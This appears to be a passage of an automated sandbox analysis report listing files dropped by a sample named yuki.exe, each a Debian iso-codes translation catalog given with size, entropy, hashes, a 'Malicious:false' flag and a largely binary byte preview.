                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 339 messages, Project-Id-Version: iso_639-3 'abhaasi'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13276
                                                                                                    Entropy (8bit):4.592618617301529
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:bB7CrhTlfkHuK7gbWUKvyKlerWfFMrsQ8aB4TNfKqOz9akao:mhaUu90PaK
                                                                                                    MD5:08AAB0C5698C608E8BEBC8A2D267317C
                                                                                                    SHA1:B5939ECDC45A3703B03F3AEBDFC6CBB0DA0D8CF4
                                                                                                    SHA-256:853799D7F533F43DBAA8FE6259F41833544D47724FD9A2B7887F5BFC457FA181
                                                                                                    SHA-512:CA8819B54603F54298106A512F1ECAEC10CEA964A8E8DC9C8F65CF50C31D6BA221FAB0111750E9ED3981C1BDD23D1A26AB4028356F0E6A7FCA0744F04D9BB287
                                                                                                    Malicious:false
                                                                                                    Preview:........S...............L.......p.......q.......{...............................................................................................................................................................................%.......1.......:.......B.......J.......R.......Y.......^.......i.......q.......z.......................................................................................................................................................................$...............6.......?.......G.......X......._.......g.......p.......u.......{.......................................................................................................................................................!.......+.......4.......8.......?.......E.......M.......T.......\.......`.......g.......p.......v.......y................................................................................................................ ....... ....... ....... ....... ......$ ....../ ......5 ......? ......G ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10473
                                                                                                    Entropy (8bit):5.056738201086365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dJ7yw7CnbE0ltU4WjV9qWxa5hW8i1XZDRVQ4qjZaohW/:57yrg4WjVDxa5hW8iti4qjZaohW/
                                                                                                    MD5:62BDDD446C215440E3CF6CBA216A9D0B
                                                                                                    SHA1:D800B6AFC9DD87B053CE8AC0541DBE3601FE973C
                                                                                                    SHA-256:91F3A5F6964167FAC67428F7B0BCF34745ADD06774118C1EB7D8BBCBBCEEC20F
                                                                                                    SHA-512:63C3AEEF01EAF8A98C11F5E1F6C493DB8741D0DB17350F2563FAAC35C2692120C30F4B39077349277B4F22540D14B6F97A744FDDE7DB1A93F11EEC0E61DFDF05
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23844
                                                                                                    Entropy (8bit):4.998804300836726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRcVqkp6gzmwZbjh5wsWP4XWAIziUG3UowlOywbgdhVLAMNLCRS:sx2VqWbzmotmsWP4XWAIYqnwcdhVLACD
                                                                                                    MD5:6AF4E2FEAB3283AE9A23C7D001808311
                                                                                                    SHA1:9BA67D6E09660D73435258E97107E68DE8D803C2
                                                                                                    SHA-256:09882ADD8AED6A8A929ACFCA886FA5C36963BF4AEE5AAC6C9BC6AD02C3EF2B29
                                                                                                    SHA-512:08120A6F239ADE5521AA2031FBE1B3211B6A2F550FA1EB7239AF6AD3F50595FC8F32DAF965F239A0C20D97495183E55100772ABFAB7A6DA90D95DD0A48053506
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_3166-2 'Ab\305\253 Z\314\247aby'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3047
                                                                                                    Entropy (8bit):5.0118238363502075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:CPgsFgUUcY04aEe0Y5vizKC4a52HsekazjG/UQDm1kC4a52HsekazjI:CP1aUHtcezFiT5jazjG/BDm1t5jazjI
                                                                                                    MD5:F1ED61F0E0ADC3F1F5AA72068C16AE1A
                                                                                                    SHA1:8470619F62C59883E09DD41D5915F9DC47097BA6
                                                                                                    SHA-256:191A40F7C125ECA00684BAAB631B78704C49F0FD0B387559EAAFF2746CCA5704
                                                                                                    SHA-512:EAAC5612151431D19E77102DDB4B7F31247E58D1993F13CF34851667024D71A1FD7394B9E963C22B720F0CE698DDC55239457A8CBA422379699A6BA0DE950C42
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......E.......Q.......b.......p.......|...............................................................................................................................................................".......+.......5.......<.......D.......K.......R.......\.......g.......p.......w...............................................................................................................................#.......-.......C.......M.......U.......d.......m.......t.......{...............................................................................................................................%.......0.......8.......?.......R.......Y.......^.......g.......o.......u.......}.......................................................................................................................................................$.......6.......>.......K.......V.......a.......l.......x.......................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 127 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5837
                                                                                                    Entropy (8bit):4.763970699074772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kf7RK2VgUmH16QpPcG///dvLC/+Pi8FUMgTuRdewkQyHTLgZ/S5BZwrmdV:SRKVU86QxcS/VK+PtFUMgTAezZHi/u5
                                                                                                    MD5:D17A60F47FC84EF91A5D00EF7C62B230
                                                                                                    SHA1:CF094BC19E390F790189436EA18E8E51F1E609F4
                                                                                                    SHA-256:FE00BDBF74CBB00453DA2DDDF371531E7996BE99A91BD47E59FE0BDDEBE9F9A9
                                                                                                    SHA-512:E9BA63D2B979CAFFF67289B65477BE300C6F4467432067A3F79D193CA056293D68DDCC114D2A3AB1FC5EC345700F72CB75599C098E5D6F9CEA5CD709731FA545
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................$.......*.......4.......<.......G.......R.......Z.......b.......i.......o.......v...............................................................................................................................................................6.......?.......R.......Z.......`.......r.......z...............................................................................................................................................%.......,.......7.......>.......F.......N.......T.......b.......l.......w.......................................................................................................................................%.......*.......6.......=.......C.......K.......R.......h... ...t...............................................................................................................#...............B.......J.......R.......g.......u.......................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):393
                                                                                                    Entropy (8bit):5.181434556536249
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijWlXYYxA9Ct0vOuvP0NXzffUWKcG/R1iMA2KMiRlF2AF24GPMXmBQ8KMW0YEk:i4Kxxjt02UkLKcG/Ki4FL24oMXmBQWi9
                                                                                                    MD5:014952DC868ED6DD82B17EA8DD8AEB57
                                                                                                    SHA1:1D199C539A8ABA19A896DBC7D39068CFDAD6BC66
                                                                                                    SHA-256:E66614F41514FFB06E712D2271E4065B279A98291C31B233A530B8A2F0D892BF
                                                                                                    SHA-512:321BBF8B4159FA350F42FE47AD298452C5E5A3FDE9917FF58BAC32751F4516C97902669CAE82E3FF2EC179B10ABBFBBADBC7D2BF7B8F83866ED0C02F0C28E877
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...O...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Faroese.Language: fo.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: fr 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10260
                                                                                                    Entropy (8bit):5.098046880408306
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dcrKx2888FavltU4WjV9qWxa5hWh2/K3BnDmyh/B9vVNgpz5L:7h88Fwg4WjVDxa5hWh2/IDmyJB99SpZ
                                                                                                    MD5:97168E5CD2F4221FAF24E943E9F61BC3
                                                                                                    SHA1:127E8A1A87ADC1470172A9ADC567082B45F0937E
                                                                                                    SHA-256:8ECDF66240ECD9D9A41C8F7F585BCEF5E233270EC9AF47554488B291F06DE4DA
                                                                                                    SHA-512:C2E31EA1E05984FBF3258E4FF2475318CB1E7A25002799F746596EFFE06A1552B055972EC697CDA13FCBC15ACB5BAA558A4EDA7040797297F47C5995AF4BBE5E
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24340
                                                                                                    Entropy (8bit):5.088216234624614
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosgEs346nbjz5wsWP48WAINiZGQMWeXXalxbiYZAPq2F+ssd:0oCs348fmsWP48WAI6QIiuAPRF+se
                                                                                                    MD5:4A923BCE0C8021DA97B0A99A742E2533
                                                                                                    SHA1:13CB8204E34EAA038C9F855A3F1F63FA3D2D975A
                                                                                                    SHA-256:D31AAEA143B639A5DB97938F055C3BA82498A950497224D9BE3806D6782C3BE6
                                                                                                    SHA-512:FECA1EFB207B687448278B1AE9111A4C716C94D19DEADC357E06BFDF705CF463166562900AB376B945B29C8768F254D4F44FA565DDEE350A908B3C4FA8792D93
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3769 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):160680
                                                                                                    Entropy (8bit):5.2452546994283145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Et4htCJ3ZX+uV/238Etx6WN/GddUlTEc0hmqDEQOzJtdID3IhQ00b12X:Et4ojatx6goc0sqJgiIhh41E
                                                                                                    MD5:89F2D55A6AF6C72B546574503A647659
                                                                                                    SHA1:8DD68D26F1C7EB37CAB97BC3C835C1BB00DA00C0
                                                                                                    SHA-256:48EBF8D099BF30B1425107AF5BB2EB5C2CF474B6F824BF420465E3AF936D01DE
                                                                                                    SHA-512:8DC18A55CE91DFB8CB073A5170CAA35966F34B26EB69040269C602A6474E3BDB8CB8F84BD8744FAD82C456233E6310F411F519AD14AAAE3F57CB02C7DE54ED7B
                                                                                                    Malicious:false
                                                                                                    Preview:.................u..............h:......i:......n:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;.......;.......;......';....../;......5;......A;......J;......P;......Z;......i;......p;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<.......<.......<...... <......&<......,<......1<......D<......K<......X<......^<......d<......l<......v<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......=.......=......1=......==......L=......T=......^=......h=......q=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......>.......>.......>......!>......,>......@>......N>......[>......c>......k>......t>......{>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......?.......?......#?......4?......<?......C?......J?......S?......b?......p?......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: 'Territoire britannique de l'Antarctique'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2860
                                                                                                    Entropy (8bit):5.213360407824239
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3WVLoWFgY+vGqIfdvqN5CWUV/Alkwus5H7HL6sgNp:rLvyLom+yaCW2/A2wTr61Np
                                                                                                    MD5:F1330C084F8A8EFC1EBB2D30E77AE214
                                                                                                    SHA1:158152527480B46B44770C14FF6160076582373E
                                                                                                    SHA-256:FE452A9D28A1D4558033167A2A717BA444C5F6407BDE7C8F1C7512012D092064
                                                                                                    SHA-512:8C7759804AAC085E44D0DBF18144FE96A833837A7EABCADF37B9E7C7E3280E9F8564F326FD6F26C60EDE75ACB0BF1C43D004B6C98FAB6B083D5D79C2E15E3AE7
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................'...............2...............8...H...................................+.......,.......#...........C.......[.......i.......v...........................................................+.......5...4.......j...&.......................3....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Unit\303\251 de compte de la BAD (Banque africaine de d\303\251veloppement)'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9998
                                                                                                    Entropy (8bit):4.987069281869574
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFT4SfTCO6VRyK0G/2LCntxLupMZ2WttSXfQIPn:SZff6TL0G/Uo/LupUmXn
                                                                                                    MD5:85A287837E659E41A523A7F4E1542CB2
                                                                                                    SHA1:9D0187132B335180AD639DFF31BD1F1B36818933
                                                                                                    SHA-256:C647FCDDCD6AFDF1FE619F8B7F51AF6948CD55A8E10F84151D4A3130DDDBC930
                                                                                                    SHA-512:CC77C841C35B620FCE0C972DCAF261BF238BD111D11CADD7DB93465CF2C26986C61F9434EAAB087C9D8C6720AF328B022D468625F0CCA68051073F35B47F25E8
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 9327 messages, Project-Id-Version: fr ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):418827
                                                                                                    Entropy (8bit):5.283626900962074
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:h/5ebkRB41EoyjlN7FhvOh/IvgKXd3qwYHvio4PpiFEy0bWOaGaG/K6Ekp0y:naIzXv8AZBWHvibBKEy0owTEDy
                                                                                                    MD5:972591CA80602D1E82CF3D75D0729D0E
                                                                                                    SHA1:94017F374FC09F3BACEAE08803C76F059B6DBE0D
                                                                                                    SHA-256:C28273B7DA4CA5AF1CFBABDD9070219A37AFA2CB88BD859AA96BA71271A7DCEE
                                                                                                    SHA-512:550B4E1F2B6540C1DBFBAD2A43B15282204B80E2776075CFC3C20053E30C0B46FE205E71FA9A2258220FFD76443CF7F7296E86FFA39C6329DAE4D413A0CDC357
                                                                                                    Malicious:false
                                                                                                    Preview:........o$.......#...0...G......`.......a.......j.......t.......y............................................................................................................................................................... .......&.......*.......7.......<.......A.......F.......L.......T.......Y.......j.......r.......y.......~.......................................................................................................................................$.......+.......1.......8.......<.......K.......U.......e.......s.......................................................................................................................................................$.......*.......8.......>.......C.......S.......Y.......`.......d.......i.......n.......................................................................................2.......=.......D.......M.......S.......a.......k.......u.......|.......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afro-asiatiques, langues'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7943
                                                                                                    Entropy (8bit):4.853571024535874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2Z+TBBCRSlSE0BfCuXr5VcJHVCj/A2yvwbvIBRQn3dSmoTtQAjrdq:4SDxYSE0BfNcajHbmQn3dsRDkuEeQJ5l
                                                                                                    MD5:9F9BAFB321F5C939874D07E368A2D895
                                                                                                    SHA1:90572B926A0AA1DDE3D3A9E064B832040A0418E9
                                                                                                    SHA-256:C3880AD3DD4A4A967E8798EC1CC50EF2B06A876E42688F830AB18064E04000B5
                                                                                                    SHA-512:027C1CFCECFB086A87E4165DC138BF692FF4F64A08E9F466490AFED3828D4A3E30E570D7D5BDBC4F40967979762B83504213B4C12779FCA376D6EE8411EB93F4
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...................................................................3.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 204 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9173
                                                                                                    Entropy (8bit):4.835911537223254
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TcGqxYHNJBHqrATpso0VSMPpT0rjzugbdLCTZzxtkut62:26V3p50VSMPpMnugbdLCT9kV2
                                                                                                    MD5:9FADB30674A661448B3EBD3392D860DB
                                                                                                    SHA1:B10CC8D777C45D0FDC3CD344D37572EA2330B169
                                                                                                    SHA-256:22F8F15C6D16E2D4A1FA5B65C6E84FFA6092FA7521BB44FA0A23CFC3FDB91D61
                                                                                                    SHA-512:773B8BB5F1FC209E6E9238D7246522363BA204968A40C3E7E79F018909C26CB9D23A1F7416876A7B689E09F3D99DDFFE3058EAC6DC90751F6971C2765DDB9B1A
                                                                                                    Malicious:false
                                                                                                    Preview:................|...............0.......1.......=.......E.......M.......\.......d.......k.......................................................................................................................................................%.......<.......E.......R.......Z.......c.......l.......s.......................................................................................................................................'.......-.......9.......K.......S.......\.......j.......................................................................................................................................................%.......3.......:.......@.......I.......Q.......Y......._.......i.......n.......v.......................................................................................................................................................................*.......1.......:.......C.......H.......N.......Y.......d.......n.......u.......}.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23950
                                                                                                    Entropy (8bit):5.011395728521389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosUeQFxD1F46nbjz5wsWP48WAINiZGVFlTtUbwcmc1PAA647KPn0Zna/:0oSMD1F48fmsWP48WAIGwcLA947c0VA
                                                                                                    MD5:8CB1BD81B49BE7C20E260AC18D099B6E
                                                                                                    SHA1:85FE7A7BC4B3015E95973280D9B096125A386388
                                                                                                    SHA-256:D013F6E647AA75F478C6EB0E15A43C6CA3000D820DA733233899B6FD2CF36EB8
                                                                                                    SHA-512:51AFA51AC105E11FCEF68F3141F03B89093E188B4D5703DD042B9EAC15F9A644FC4ACE633B3F76003048D348F7545E8152445AF02F8364FF4FCA2E5D7E893356
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 14 messages, Project-Id-Version: iso_3166-3 'Teritori antartic britanic'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1483
                                                                                                    Entropy (8bit):5.16721000485554
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:4ZkJ3NHl/LvhgXBaOEfUWXmikHAjos5t0Ugre4tk/maXmGNdAqPmid+O9Eo:4SJ3NHtLvhR3WsoUgDOOFOB
                                                                                                    MD5:41BB07B0C738CE3AA73C151BE29FCA0E
                                                                                                    SHA1:E3BA844D432175D6A1EBC618CF056FAF2B2529BF
                                                                                                    SHA-256:86F043F9990C484B8DA988D0BD1247E42FF2F859FDF73CBCDA9F1BD91993DF3F
                                                                                                    SHA-512:5F3E4DE7FE700B8174AABCDA0049C844426B05F0CD19544C0F4CC258B263F1D4F1EF7C6EE1E1ADD36F215CC4E9E2F4CA1B186DF9275C9E3B334E34955497A279
                                                                                                    Malicious:false
                                                                                                    Preview:................................H.......I...)...e...*...............................)...................0.......=.......J.......\...+...r...............f...+.......+.......................%...........$.......@.......R.......`.......o...........-....................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territories.Netherlands Antilles.Neutral Zone.New Hebrides.Panama Canal Zone.Serbia and Montenegro.Yugoslavia, (Socialist) Federal Republic of.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2023-12-21 10:55+0000.Last-Translator: adecorte <adecorte@gmail.com>.Language-Team: Friulian <https://hosted.weblate.org/projects/iso-codes/iso-3166-3/fur/>.Language: fur.MIME-Version: 1.0.Content-Type:
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8 messages, Project-Id-Version: iso_639-3 'Abaga'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):755
                                                                                                    Entropy (8bit):5.167022126383152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i90yrc26U0CXxq7it02UkW/ePqLLrtk/4l5NDV/yXmBQWiOWrS+JCn:u0G/66Vt0U6e4tk/2JaXmGbo
                                                                                                    MD5:1C35597148B54B33696D86B3370A57ED
                                                                                                    SHA1:C36D6CF1F28A39D3CC31B8DE6957E05EBD02ADDF
                                                                                                    SHA-256:EE5744983B1FCC41FBDF97AEBEC2930F119EF3936C7AA0A82E3B2C6977959C9A
                                                                                                    SHA-512:3412A6CDA8DB730B2A35E8F9E6FFB8ACAADCC510C2B4C018FE242F87350144A96B7CC416EF5DB729C1BDFA3559B6359A0F29A2D8BA2CC0C919336886DFE72B3C
                                                                                                    Malicious:false
                                                                                                    Preview:................\........................................................................................................................................................................................Abaga.Abkhazian.Afar.Bankon.Friulian.Manide.Solong.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-12-23 19:27+0000.Last-Translator: adecorte <adecorte@gmail.com>.Language-Team: Friulian <https://hosted.weblate.org/projects/iso-codes/iso-639-3/fur/>.Language: fur.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.10.1..Abaga.Abc.s.Afar.Bankon.Furlan.Manide.Solong.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Lenghis afro-asiatichis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7791
                                                                                                    Entropy (8bit):4.8255768534676475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2HzKaZn1RSlSE0BfCuXr5VcJHVC9jwDv+ErRfRl0uIGfULfbv:4SDxp74SE0BfNca9YRfRlh6Lfbv
                                                                                                    MD5:7038BC075A9577A1A5D2B2C6996B76E1
                                                                                                    SHA1:0F82C5C2C5E747F5188AA04E7C02E3BA0A9BD2E6
                                                                                                    SHA-256:3F5AEF4112B2BABE0E0D5ACD1C5093FF7BF8929F02A482CA313B71F701B384AA
                                                                                                    SHA-512:3F99146B4292C764B0083F4795F1916848F5AD616A2CA53DC81455DB2D1B7D718200B9510AF274776DDED2C7E2A6DB24C694FF03FFCEFB7FA4305B86AAC1C62A
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 209 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9356
                                                                                                    Entropy (8bit):4.779475948916438
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:BWHEtq+4hdQPy/Rvwe3yTF2zugHLu4uNvDVet8qvouC:BWEqHd0yZvN3yBWugHLu4uBVemqvoz
                                                                                                    MD5:0327BDC7AD3D796A2C18FCB25BE53F3E
                                                                                                    SHA1:1C005969B7D2A4A073FBDC00F580E602E309B1CA
                                                                                                    SHA-256:298866271FE5107B1D0AE63B65D699B73DA023BE5906467CF3C0DDFDD679A41A
                                                                                                    SHA-512:B33E2FA4C9A8ACB93039BBA621DA664615D6E04CFF545680161C74CE221B12F00081D7F5302C6055B7BDE26AEA17589530D3883501E3FB6CEF48480CC5BFEEA4
                                                                                                    Malicious:false
                                                                                                    Preview:........................,.......................................................................................................................................%.......0.......9.......A.......I.......P.......V.......^.......e.......m....................................................................................................... .......%.......+.......C.......L.......T.......a.......l.......t.......y......................................................................................................................./.......4.......<.......C.......Q.......W......._.......g.......m.......w.......~...................................................................!...................................................................$.......,.......8.......?.......E.......M.......S.......Z.......a.......l.......r.......{.......................................................................................................................................................$.......,.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 407 messages, Project-Id-Version: iso_3166-1 'An Afganast\303\241in'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23528
                                                                                                    Entropy (8bit):5.076558370923516
                                                                                                    Encrypted:false
